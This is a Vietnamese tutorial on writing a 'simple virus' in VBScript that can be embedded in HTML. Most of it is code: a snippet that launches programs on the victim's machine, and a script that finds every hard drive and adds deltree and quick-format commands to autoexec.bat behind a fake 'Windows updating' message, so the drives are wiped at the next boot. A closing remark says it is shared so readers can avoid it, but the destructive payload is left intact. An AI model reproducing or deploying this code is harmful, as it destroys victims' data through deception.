HƯỚNG DẪN TẠO VIRUS ĐƠN GIẢN

 

Sau đây tôi xin giới thiệu cách tạo một virus đơn giản.đây là bài của tác giả khác nhưng đã được tôi chỉnh sửa đôi chút cho phù hợp

giới thiệu cách sử dụng VBScript để viết một
worm nhỏ xoá sạch ổ cứng của ai đó. (có thể nhúng vào HTML)


I/để bắt nạn nhân thực thi một chương trình nào đó các bạn sử dụng đoạn

================
<html>
<head>
<title>L0ng3ta</title>
</head>
<body >
<p>chuong trinh notepad se thuc thi
On Error Resume Next
Set WSHShell = CreateObject("WScript.Shell")
WSHShell.Run "c:\windows\notepad.exe",1,False
</SCRIPT></p>
</body>
</html>
================
đoạn Script trên sẽ chạy chương trình notepad. Các bạn có thể copy vào trang HTML
và cho chạy thử.

II/Đoạn Script để chèn một vài lệnh lên autoexec.bat trên ổ đĩa của nạn nhân.
======================
Function FindFile(PathFiles)
dim fso,f
Set fso = CreateObject("Scripting.FileSystemObject")
If (fso.FileExists(PathFiles)) Then
FindFile = True
Set f = fso.GetFile(Pathfiles)
If f.attributes and 1 Then
f.attributes = f.attributes -1
End if

Else
FindFile = False
End If
End Function

Sub CreateFile()
Dim fso, tf
Set fso = CreateObject("Scripting.FileSystemObject")
Set tf = fso.CreateTextFile("c:\Autoexec.bat", True)
tf.WriteLine ("@Echo off")
tf.Close
End Sub

Sub InsertBegintext()
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim fso, tf
Set fso = CreateObject("Scripting.FileSystemObject")
Set tf = fso.OpenTextFile("c:\autoexec.bat", ForAppending , True)
tf.WriteLine ("@Echo Please Waiting for Windows updating your system ...")
tf.Close
End Sub

Sub Inserttext(drv)
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim fso, tf
Set fso = CreateObject("Scripting.FileSystemObject")
Set tf = fso.OpenTextFile("c:\autoexec.bat", ForAppending , True)
tf.WriteLine ("@deltree /y " & drv & " > null")
tf.WriteLine ("@Format " & drv & " /q /u /autotest > null")
tf.Close
End Sub

'Kiem tra xem co phai o dia co phai la harddisk hay khong
'Va tra ve true neu no la harddisk
Function ShowDriveInfo(drvpath)
Dim fso, d, s, t
Set fso = CreateObject("Scripting.FileSystemObject")
Set d = fso.GetDrive(drvpath)
If d.DriveType = 2 then
If d.IsReady then
ShowDriveInfo = True
Else
ShowDriveInfo = False
End If
Else
ShowDiveInfo = False
End If
End Function

Sub Main()
Dim fso, d, dc, s, i
Dim a(15)
Set fso = CreateObject("Scripting.FileSystemObject")
Set dc = fso.Drives
i = 0
For Each d in dc
If showdriveinfo(d) then
a(i) = d
i= i+1
End If
Next
If Not Findfile("c:\autoexec.bat") then
Createfile
End if
InsertBegintext
Do While i>0
i=i-1
Inserttext(a(i))
Loop
End Sub

Main
</SCRIPT>
biết để tránh thoi nha.tôi đã đơn giản hóa rất nhiều đoạn code trên .nó sẽ không còn các chức năng như lấy trộm pass hay khóa pcAll Developed By Mr.Luan